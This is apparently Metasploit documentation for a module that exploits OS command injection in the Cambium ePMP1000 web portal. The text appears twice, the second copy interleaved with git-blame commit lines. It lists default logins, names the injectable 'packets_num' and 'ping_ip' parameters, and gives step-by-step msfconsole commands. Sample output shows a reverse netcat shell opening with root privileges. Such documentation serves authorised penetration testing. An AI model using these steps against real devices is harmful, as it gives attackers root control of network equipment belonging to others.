documentation/modules/exploit/linux/http/epmp1000_ping_cmd_shell.md

This module exploits an OS Command Injection vulnerability in Cambium ePMP1000 device management portal. It requires any one of the following login credentials - admin/admin, installer/installer, home/home - to set up a reverse netcat shell.

This module injects the payload in 'packets_num' parameter. Alternatively, a second, vulnerable parameter 'ping_ip' can also be used.

Note: `cmd/unix/reverse_netcat` is the only payload that seems to work and is stable. After the session is opened, there may be a slight delay in response after first command is issued. There are no delays in receiving responses to subsequent command(s). It is recommended to use 'exploit -j'.

## Verification Steps

1. Do: ```use exploit/unix/http/epmp1000_ping_cmd_shell```
2. Do: ```set RHOST [IP]```
3. Do: ```set RPORT [PORT]```
4. Do: ```set LHOST [IP]```
5. Do: ```exploit -j```

## Sample Output

  ```
msf > use use exploit/unix/http/epmp1000_ping_cmd_shell
msf exploit(epmp1000_ping_cmd_shell) > set RHOST 192.168.0.2
msf exploit(epmp1000_ping_cmd_shell) > set RPORT 80
msf exploit(epmp1000_ping_cmd_shell) > set LHOST 192.168.0.104
msf exploit(epmp1000_ping_cmd_shell) > exploit -j

[*] Started reverse TCP handler on 192.168.0.104:4444
[+] SUCCESSFUL LOGIN - 192.168.0.2:80 - "installer":"installer"
[*] Sending payload...
[*] Command shell session 10 opened (192.168.0.104:4444 -> 192.168.0.2:43594) at 2017-12-02 06:08:00 +0700

msf exploit(epmp1000_ping_cmd_shell) > sessions -l

Active sessions
===============

  Id  Type            Information  Connection
  --  ----            -----------  ----------
  10   shell cmd/unix               192.168.0.104:4444 -> 192.168.0.2:43594 (192.168.0.2)

msf exploit(epmp1000_ping_cmd_shell) > sessions -i 10
[*] Starting interaction with 10...

id
uid=0(root) gid=0(root)

  ```
Adding docs for modules 2017-12-18 16:47:43 -06:00			`This module exploits an OS Command Injection vulnerability in Cambium ePMP1000 device management portal. It requires any one of the following login credentials - admin/admin, installer/installer, home/home - to set up a reverse netcat shell.`

			`This module injects the payload in 'packets_num' parameter. Alternatively, a second, vulnerable parameter 'ping_ip' can also be used.`

			Note: `cmd/unix/reverse_netcat` is the only payload that seems to work and is stable. After the session is opened, there may be a slight delay in response after first command is issued. There are no delays in receiving responses to subsequent command(s). It is recommended to use 'exploit -j'.

			`## Verification Steps`

			1. Do: ```use exploit/unix/http/epmp1000_ping_cmd_shell```
			2. Do: ```set RHOST [IP]```
			3. Do: ```set RPORT [PORT]```
			4. Do: ```set LHOST [IP]```
			5. Do: ```exploit -j```

			`## Sample Output`

			```
			`msf > use use exploit/unix/http/epmp1000_ping_cmd_shell`
			`msf exploit(epmp1000_ping_cmd_shell) > set RHOST 192.168.0.2`
			`msf exploit(epmp1000_ping_cmd_shell) > set RPORT 80`
			`msf exploit(epmp1000_ping_cmd_shell) > set LHOST 192.168.0.104`
			`msf exploit(epmp1000_ping_cmd_shell) > exploit -j`

Kill trailing whitespace 2017-12-18 16:56:09 -06:00			`[*] Started reverse TCP handler on 192.168.0.104:4444`
Adding docs for modules 2017-12-18 16:47:43 -06:00			`[+] SUCCESSFUL LOGIN - 192.168.0.2:80 - "installer":"installer"`
			`[*] Sending payload...`
			`[*] Command shell session 10 opened (192.168.0.104:4444 -> 192.168.0.2:43594) at 2017-12-02 06:08:00 +0700`

			`msf exploit(epmp1000_ping_cmd_shell) > sessions -l`

			`Active sessions`
			`===============`

			`Id Type Information Connection`
			`-- ---- ----------- ----------`
			`10 shell cmd/unix 192.168.0.104:4444 -> 192.168.0.2:43594 (192.168.0.2)`

			`msf exploit(epmp1000_ping_cmd_shell) > sessions -i 10`
			`[*] Starting interaction with 10...`

			`id`
			`uid=0(root) gid=0(root)`

			```